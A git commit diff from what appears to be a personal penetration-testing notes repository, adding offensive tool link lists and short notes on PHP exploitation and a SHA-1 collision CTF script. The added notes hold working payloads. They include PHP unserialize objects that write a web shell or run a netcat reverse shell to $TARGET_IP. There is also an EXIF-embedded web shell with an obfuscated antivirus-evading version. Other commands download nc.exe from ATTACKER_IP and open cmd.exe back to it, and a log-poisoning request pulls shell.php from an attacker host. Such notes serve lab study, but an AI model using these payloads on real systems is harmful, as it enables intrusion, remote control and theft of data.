cleanup done

This commit is contained in:
Stefan Etringer 2022-11-13 22:52:30 +01:00
parent b75bcb944f
commit 0c98cfe60f
13 changed files with 218 additions and 8 deletions

View File

@ -7,6 +7,29 @@
[netbiosX' Checklists](https://github.com/netbiosX/Checklists.git)
## Web
* [JSONBee - Bypass Content Security Policy](https://github.com/zigoo0/JSONBee.git)
* [Beef Framework](https://github.com/beefproject/beef.git)
### JWT
* [jwt Generator](https://jwt.io/)
* [jwt-cracker](https://github.com/lmammino/jwt-cracker.git)
* [jwt_tool](https://github.com/ticarpi/jwt_tool.git)
### SSTI
[tplmap](https://github.com/epinna/tplmap.git)
### XXE
* [xxeserv](https://github.com/staaldraad/xxeserv.git)
### CMS
[Typo3Scan](https://github.com/whoot/Typo3Scan.git)
## Domain Enumeration
[Subrake](https://github.com/hash3liZer/Subrake.git)
@ -14,13 +37,15 @@
[gobuster](https://github.com/OJ/gobuster.git)
[RustScan](https://github.com/RustScan/RustScan.git)
## SMB Enumeration
[ShawnDEvans' smbmap](https://github.com/ShawnDEvans/smbmap.git)
## Container Enumeration
[kubeletctl](https://github.com/cyberark/kubeletctl.git)
[deepce](https://github.com/stealthcopter/deepce.git)
## CMS
[Typo3Scan](https://github.com/whoot/Typo3Scan.git)
[dive](https://github.com/wagoodman/dive.git)
## Telecommunications

12
Enumeration/SMBmap.md Normal file
View File

@ -0,0 +1,12 @@
# smbmap
* [Repo](https://github.com/ShawnDEvans/smbmap.git)
* `python3 -m pip install -r requirements.txt`
# Usage
* `-x` execute command on server
* `-s` enumerate share
```sh
smbmap -u "admin" -p "password" -H "10.10.10.10" -x 'ipconfig'
```

View File

@ -9,6 +9,25 @@
[Padbuster - padding Oracle Attacks](https://github.com/AonCyberLabs/PadBuster.git)
### PHP
* [Chankro](https://github.com/TarlogicSecurity/Chankro.git)
* [phpgcc](https://github.com/ambionics/phpggc.git)
## Binaries
* [ropstar](https://github.com/xct/ropstar.git)
## Windows
* [crackmapexec](https://github.com/Porchetta-Industries/CrackMapExec.git)
* [Impacket](https://github.com/SecureAuthCorp/impacket.git)
* [windows-kernel-exploits](https://github.com/SecWiki/windows-kernel-exploits.git)
* [PrintNightmare](https://github.com/ly4k/PrintNightmare.git)
* [printspoofer](https://github.com/dievus/printspoofer.git)
* [CVE-2021-1675](https://github.com/corelight/CVE-2021-1675.git)
## Printer Exploitation
[RUB-NDS Printer Exploitation Framework](https://github.com/RUB-NDS/PRET.git)

View File

@ -1,4 +1,8 @@
# Command Injection
# PHP Command Injection
Injecting commands to execute code on the server side via php.
* [Hacktricks](https://book.hackstricks.xyz/pentesting-web/file-upload)
* Blind injection
* Verbose injection
@ -8,12 +12,12 @@
* Redirect to logfile and read
* Use `sleep` or `timeout` to check if ci is possible in general
### Detect Blind Command Injection
Try to save output to URI resource like `output.php`
## Functions
* Watch out for
* `eval()`
* `exec()`
* `passthru()`
* `system()`

View File

@ -0,0 +1,6 @@
# PHP Filter
* Include into GET query, and get index page, for example
```sh
<URL>/?view=php://filter/read=convert.base64-encode/resource=./dog/../index
```

View File

@ -0,0 +1,29 @@
# Unserialize
* [Not so secure](https://notsosecure.com/remote-code-execution-via-php-unserialize)
* Serialize via
```php
<?php
class FormSubmit {
public $form_file = 'messages.php';
public $message = '<?php
if(isset($_GET[\'cmd\']))
{
system($_GET[\'cmd\']);
}
?>';
}
print urlencode(serialize(new FormSubmit));
?>
```
```php
<?php class file
{
public $file = 'rev.php'; public $data = '<?php shell_exec("nc -e /bin/bash $TARGET_IP 4455"); ?>';
}
echo (serialize(new file));
?>
```

View File

@ -0,0 +1,35 @@
# PHP Payload in Image ExifData
* Test
```sh
exiftool -Comment="<?php echo \"<pre>Test Payload</pre>\"; die(); ?>" test-USERNAME.jpeg.php
```
* Build Payload with AV evasion
```sh
<?php
$cmd = $_GET["wreath"];
if (isset($cmd)){
echo "<pre>" . shell_exec($cmd) . "</pre>";
}
die();
?>
```
* [php obfuscater](https://www.gaijin.at/en/tools/php-obfuscator)
* Obfuscated code with escaped `$`
```sh
<?php \$p0=\$_GET[base64_decode('d3JlYXRo')];if(isset(\$p0)){echo base64_decode('PHByZT4=').shell_exec(\$p0).base64_decode('PC9wcmU+');}die();?>
```
* Upload and execute commands with get parameter `?wreath=systeminfo`
## Uploading Reverse through Webshell
* Parameter for Webshell
```sh
curl http://ATTACKER_IP/nc.exe -o c:\\windows\\temp\\nc-USERNAME.exe
```
* Trigger uploaded netcat
```sh
powershell.exe c:\\windows\\temp\\nc-USERNAME.exe ATTACKER_IP ATTACKER_PORT -e cmd.exe
```

View File

@ -0,0 +1,20 @@
# RCE inside HTTP Request Header
* a.k.a. Log Poisoning
* User Agent can be filled with php code
```sh
GET /?view=./dog/../../../../../../../../../var/log/apache2/access.log&ext= HTTP/1.1
Host: 10.10.59.238
User-Agent: <?php file_put_contents('monkey.php',file_get_contents('http://<attacker-IP>:<attacker-Port>/shell.php')); ?>
[...]
```
* copied from browser as curl command:
```
curl 'http://10.10.211.157/?ext=%20HTTP/1.1&view=./dog/../../../../var/log/apache/access.log' -H "User-Agent: <?php file_put_contents('monkey.php', file_get_contents('http://10.9.7.193:8000/shell.php'));?>"
```
* go to the access log
```sh
10.10.211.157/?ext=.log&view=./dog/../../../../var/log/apache2/access
```
* Afterwards visit `10.10.211.157/monkey.php`

View File

@ -0,0 +1,4 @@
# Password Reset
* Using a password reset while inserting an email address via GET and POST method.
* `$_REQUEST` as an array favors POST over GET. So, sending the attacker email address via POST with the GET query parameter.

View File

@ -0,0 +1,15 @@
# Preload Library
* [Bug report](https://bugs.php.net/bug.php?id=46741)
* [Chankro repo](https://github.com/TarlogicSecurity/Chankro.git)
## Usage
* Create lib, find path via `<URL>/phpinfo.php`
```sh
echo "#!/usr/bin/env bash" > rev.sh
echo "cat /etc/passwd > <basepath>/output.txt" >> rev.sh
python2 ./chankro.py --arch 64 --input rev.sh --output chan.php --path <basepath>
```
* Put into image file via exiftool or write magic header
* Upload

4
Hashes/CeWL.md Normal file
View File

@ -0,0 +1,4 @@
# Cewl
* Wordlist generator from website
* [CeWl repo](https://github.com/digininja/CeWL.git)

33
Hashes/Hash Collisions.md Normal file
View File

@ -0,0 +1,33 @@
# Hash Collisions
# SHA-1
* http://shattered.io
* The following code is taken from a writeup from [bl4ade's repo](https://github.com/bl4de/ctf/blob/master/2017/BostonKeyParty_2017/Prudentialv2/Prudentialv2_Cloud_50.md)
```python
#!/usr/bin/env python
import requests
# this is copy/paste from Hex editor - two different files with the same SHA1 checksum
name = '255044462D312E33 0A25E2E3 CFD30A0A 0A312030 206F626A 0A3C3C2F 57696474 68203220 3020522F 48656967 68742033 20302052 2F547970 65203420 3020522F 53756274 79706520 35203020 522F4669 6C746572 20362030 20522F43 6F6C6F72 53706163 65203720 3020522F 4C656E67 74682038 20302052 2F426974 73506572 436F6D70 6F6E656E 7420383E 3E0A7374 7265616D 0AFFD8FF FE002453 48412D31 20697320 64656164 21212121 21852FEC 09233975 9C39B1A1 C63C4C97 E1FFFE01 7F46DC93 A6B67E01 3B029AAA 1DB2560B 45CA67D6 88C7F84B 8C4C791F E02B3DF6 14F86DB1 690901C5 6B45C153 0AFEDFB7 6038E972 722FE7AD 728F0E49 04E046C2 30570FE9 D41398AB E12EF5BC 942BE335 42A4802D 98B5D70F 2A332EC3 7FAC3514 E74DDC0F 2CC1A874 CD0C7830 5A215664 61309789 606BD0BF 3F98CDA8 044629A1 3C68746D 6C3E0A3C 73637269 7074206C 616E6775 6167653D 6A617661 73637269 70742074 7970653D 22746578 742F6A61 76617363 72697074 223E0A3C 212D2D20 40617277 202D2D3E 0A0A7661 72206820 3D20646F 63756D65 6E742E67 6574456C 656D656E 74734279 5461674E 616D6528 2248544D 4C22295B 305D2E69 6E6E6572 48544D4C 2E636861 72436F64 65417428 31303229 2E746F53 7472696E 67283136 293B0A69 66202868 203D3D20 27373327 29207B0A 20202020 646F6375 6D656E74 2E626F64 792E696E 6E657248 544D4C20 3D20223C 5354594C 453E626F 64797B62 61636B67 726F756E 642D636F 6C6F723A 5245443B 7D206831 7B666F6E 742D7369 7A653A35 3030253B 7D3C2F53 54594C45 3E3C4831 3E262378 31663634 383B3C2F 48313E22 3B0A7D20 656C7365 207B0A20 20202064 6F63756D 656E742E 626F6479 2E696E6E 65724854 4D4C203D 20223C53 54594C45 3E626F64 797B6261 636B6772 6F756E64 2D636F6C 6F723A42 4C55453B 7D206831 7B666F6E 742D7369 7A653A35 3030253B 7D3C2F53 54594C45 3E3C4831 3E262378 31663634 393B3C2F 48313E22 3B0A7D0A 0A3C2F73 63726970 743E0A0A'
password = '25504446 2D312E33 0A25E2E3 CFD30A0A 0A312030 206F626A 0A3C3C2F 57696474 68203220 3020522F 48656967 68742033 20302052 2F547970 65203420 3020522F 53756274 79706520 35203020 522F4669 6C746572 20362030 20522F43 6F6C6F72 53706163 65203720 3020522F 4C656E67 74682038 20302052 2F426974 73506572 436F6D70 6F6E656E 7420383E 3E0A7374 7265616D 0AFFD8FF FE002453 48412D31 20697320 64656164 21212121 21852FEC 09233975 9C39B1A1 C63C4C97 E1FFFE01 7346DC91 66B67E11 8F029AB6 21B2560F F9CA67CC A8C7F85B A84C7903 0C2B3DE2 18F86DB3 A90901D5 DF45C14F 26FEDFB3 DC38E96A C22FE7BD 728F0E45 BCE046D2 3C570FEB 141398BB 552EF5A0 A82BE331 FEA48037 B8B5D71F 0E332EDF 93AC3500 EB4DDC0D ECC1A864 790C782C 76215660 DD309791 D06BD0AF 3F98CDA4 BC4629B1 3C68746D 6C3E0A3C 73637269 7074206C 616E6775 6167653D 6A617661 73637269 70742074 7970653D 22746578 742F6A61 76617363 72697074 223E0A3C 212D2D20 40617277 202D2D3E 0A0A7661 72206820 3D20646F 63756D65 6E742E67 6574456C 656D656E 74734279 5461674E 616D6528 2248544D 4C22295B 305D2E69 6E6E6572 48544D4C 2E636861 72436F64 65417428 31303229 2E746F53 7472696E 67283136 293B0A69 66202868 203D3D20 27373327 29207B0A 20202020 646F6375 6D656E74 2E626F64 792E696E 6E657248 544D4C20 3D20223C 5354594C 453E626F 64797B62 61636B67 726F756E 642D636F 6C6F723A 5245443B 7D206831 7B666F6E 742D7369 7A653A35 3030253B 7D3C2F53 54594C45 3E3C4831 3E262378 31663634 383B3C2F 48313E22 3B0A7D20 656C7365 207B0A20 20202064 6F63756D 656E742E 626F6479 2E696E6E 65724854 4D4C203D 20223C53 54594C45 3E626F64 797B6261 636B6772 6F756E64 2D636F6C 6F723A42 4C55453B 7D206831 7B666F6E 742D7369 7A653A35 3030253B 7D3C2F53 54594C45 3E3C4831 3E262378 31663634 393B3C2F 48313E22 3B0A7D0A 0A3C2F73 63726970 743E0A0A'
print '[+] create URL decoded strings to send as GET parameters [name] and [password]...'
name = ''.join(name.split(' '))
password = ''.join(password.split(' '))
namestr = ''.join(['%' + name[i] + name[i + 1]
for i in range(0, len(name)) if i % 2 == 0])
passwordstr = ''.join(['%' + password[j] + password[j + 1]
for j in range(0, len(password)) if j % 2 == 0])
print '[+] sending request to http://54.202.82.13/?name=[name]&password=[password]'
u = 'http://54.202.82.13/?name={}&password={}'.format(namestr, passwordstr)
resp = requests.get(u, headers={
'Host': '54.202.82.13'
})
```

View File

@ -1,5 +1,9 @@
# Hashes References
## Hash Collisions
[corkami's collisions collection](https://github.com/corkami/collisions.git)
## Password and Username Generation
[exrex](https://github.com/asciimoo/exrex.git)